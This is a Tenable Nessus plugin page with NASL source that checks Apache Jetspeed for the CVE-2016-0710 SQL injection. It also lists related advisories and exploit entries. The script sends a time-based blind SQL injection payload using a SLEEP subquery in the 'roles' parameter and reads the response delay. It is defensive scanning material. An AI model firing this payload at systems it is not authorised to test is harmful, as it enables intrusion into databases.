Lucene search
This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.APACHE_JETSPEED_USERMANAGER_SQLI.NASLHistoryMar 28, 2016 - 12:00 a.m.
Apache Jetspeed User Manager Service SQLi
2016-03-2800:00:00
This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
15
The Apache Jetspeed application running on the remote host is affected by a SQL injection vulnerability in the User Manager service due to improper sanitization of user-supplied input to the ‘user’ and ‘role’ parameters. An unauthenticated, remote attacker can exploit this to inject SQL queries, resulting in the manipulation of the back-end database or the disclosure of information.
Note that Apache Jetspeed is reported to be affected by other vulnerabilities as well; however, Nessus has not tested for these.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(90248);
script_version("1.8");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2016-0710");
script_name(english:"Apache Jetspeed User Manager Service SQLi");
script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a SQL injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The Apache Jetspeed application running on the remote host is affected
by a SQL injection vulnerability in the User Manager service due to
improper sanitization of user-supplied input to the 'user' and 'role'
parameters. An unauthenticated, remote attacker can exploit this to
inject SQL queries, resulting in the manipulation of the back-end
database or the disclosure of information.
Note that Apache Jetspeed is reported to be affected by other
vulnerabilities as well; however, Nessus has not tested for these.");
script_set_attribute(attribute:"see_also", value:"https://portals.apache.org/jetspeed-2/security-reports.html");
script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Jetspeed version 2.3.1 when it becomes available.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-0710");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Apache Jetspeed Arbitrary File Upload');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/28");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:jetspeed");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("apache_jetspeed_detect.nbin");
script_require_keys("installed_sw/Apache Jetspeed");
script_require_ports("Services/www", 8080);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
app = "Apache Jetspeed";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:8080);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
stimes = make_list(3, 9, 15);
num_queries = max_index(stimes);
vuln = FALSE;
for (i = 0; i < max_index(stimes); i++)
{
http_set_read_timeout(stimes[i] + 10);
then = unixtime();
url = "/services/usermanager/users/?";
sqli ="roles=foo%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(" + stimes[i] + ")))foo)%20AND%20%27bar%27%3D%27bar";
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url + sqli,
exit_on_fail : TRUE
);
now = unixtime();
ttime = now - then;
time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
stimes[i] + ' secs Response Time : ' + ttime + ' secs\n';
overalltime += ttime;
if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 5)) )
{
vuln = TRUE;
output =
'Blind SQL Injection Results' +
'\n Query : (SELECT * FROM (SELECT(sleep(' +stimes[i]+ ')))foo)' +
'\n Response time : ' + ttime + ' secs' +
'\n Number of queries executed : ' + num_queries +
'\n Total test time : ' + overalltime + ' secs' +
'\n Time per query : ' +
'\n'+ " " + time_per_query;
continue;
}
else
vuln = FALSE;
}
if (vuln)
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
sqli : TRUE, # Sets SQLInjection KB key
request : make_list(build_url(port:port, qs:dir + url + sqli)),
output : output
);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
Related
seebug
seebug
Apache Jetspeed 目录穿越漏洞
2016-03-07 00:00:00
checkpoint_advisories
checkpoint_advisories
Apache Jetspeed SQL Injection (CVE-2016-0710)
2016-04-18 00:00:00
cvelist
cvelist
CVE-2016-0710
2016-04-11 14:00:00
prion
prion
Sql injection
2016-04-11 14:59:00
cve
cve
CVE-2016-0710
2016-04-11 14:59:00
packetstorm
packetstorm
Apache Jetspeed Arbitrary File Upload
2016-03-31 00:00:00
metasploit
metasploit
Apache Jetspeed Arbitrary File Upload
2016-03-24 00:22:32
zdt
zdt
Apache Jetspeed - Arbitrary File Upload (Metasploit)
2016-03-31 00:00:00
exploitdb
exploitdb
Apache Jetspeed - Arbitrary File Upload (Metasploit)
2016-03-31 00:00:00
ibm
ibm
openvas
openvas
Apache Jetspeed Multiple Vulnerabilities (Mar 2016)
2016-04-01 00:00:00
Related for APACHE_JETSPEED_USERMANAGER_SQLI.NASL